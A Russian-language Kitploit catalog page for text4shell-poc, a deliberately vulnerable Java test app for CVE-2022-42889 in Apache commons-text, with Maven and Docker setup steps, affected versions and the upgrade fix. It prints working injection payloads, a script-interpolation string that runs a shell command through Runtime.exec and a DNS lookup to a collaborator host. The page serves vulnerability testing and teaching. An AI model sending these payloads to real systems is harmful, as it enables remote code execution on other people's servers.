Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
text4shell-poc — Приложение Proof of Concept для тестирования CVE-2022-42889 | Kitploit
Инструменты/GitHubGitHub/securekomodo/text4shell-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubsecurekomodo/text4shell-poc

text4shell-poc

Приложение Proof of Concept для тестирования CVE-2022-42889

Репозиторий
8113 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-42889 PoC тестовое приложение

Это уязвимое приложение, разработанное в качестве Proof of Concept для уязвимости CVE-2022-42889.

Установка Maven

Для запуска вам понадобятся:

  • JDK 17 или выше
  • Maven
  1. Клонируйте git-репозиторий
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Выполните установку Maven для создания JAR-файла
root@kitploit:~
mvn clean install

Это создаст папку ./target, и внутри этой папки должен находиться JAR-файл text4shell-poc-0.0.1-SNAPSHOT.jar

  1. Запустите веб-сервер
root@kitploit:~
java -jar ./target/text4shell-poc-0.0.1-SNAPSHOT.jar

По умолчанию это запустит веб-сервер на вашем localhost, прослушивающий порт 8080

  1. Откройте веб-сервер в браузере

Откройте веб-сервер по адресу http://localhost:8080/, и вы должны увидеть следующий вывод

root@kitploit:~
Text4Shell POC Test -@securekomodo
Send payloads to /reflected?poc=yourpayload
OR Send payloads to /blind with payload as your userAgent
  1. Эксплуатируйте вручную или выполните сканирование с помощью text4shell-scan

Примеры эксплойт-payload

root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/itworked')}
root@kitploit:~
${dns:<burp collaborator host>)}

Рекомендуемый URL-энкодер для успешной демонстрации эксплуатации: https://www.urlencoder.org/.

Docker

В качестве альтернативы вы можете использовать Docker для запуска этого PoC:

  1. Клонируйте git-репозиторий
root@kitploit:~
git clone https://github.com/securekomodo/text4shell-poc.git
cd text4shell-poc
  1. Сборка Docker
root@kitploit:~
docker build --tag=text4shell-poc .
  1. Запуск Docker
root@kitploit:~
docker run -p 80:8080 text4shell-poc
  1. Проверьте уязвимое приложение
root@kitploit:~
http://localhost/
  1. Атаку можно выполнить, передав строку “${prefix:name}”, как показано ниже:
root@kitploit:~
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
root@kitploit:~
${dns:<burp collaborator host>)}

Рекомендуемый URL-энкодер для успешной демонстрации эксплуатации: https://www.urlencoder.org/.

В качестве альтернативы вы можете проверить эффективность инструментов сканирования, таких как text4shell-scan

Уязвимы ли вы?

Чтобы ваш код был уязвим, необходимо:

  • Использовать версию Apache commons-text от 1.5.0 до 1.10.0 (не включая)
  • Использовать интерполяцию для вашей StringSubstituion (см. https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/StringSubstitutor.html) - обратите внимание, что это не очень распространено

Исправление

Исправление заключается в обновлении ваших экземпляров commons-text до версии 1.10.0 или новее.

Автор

Bryan Smith

  • Twitter: https://twitter.com/securekomodo
Скачать инструмент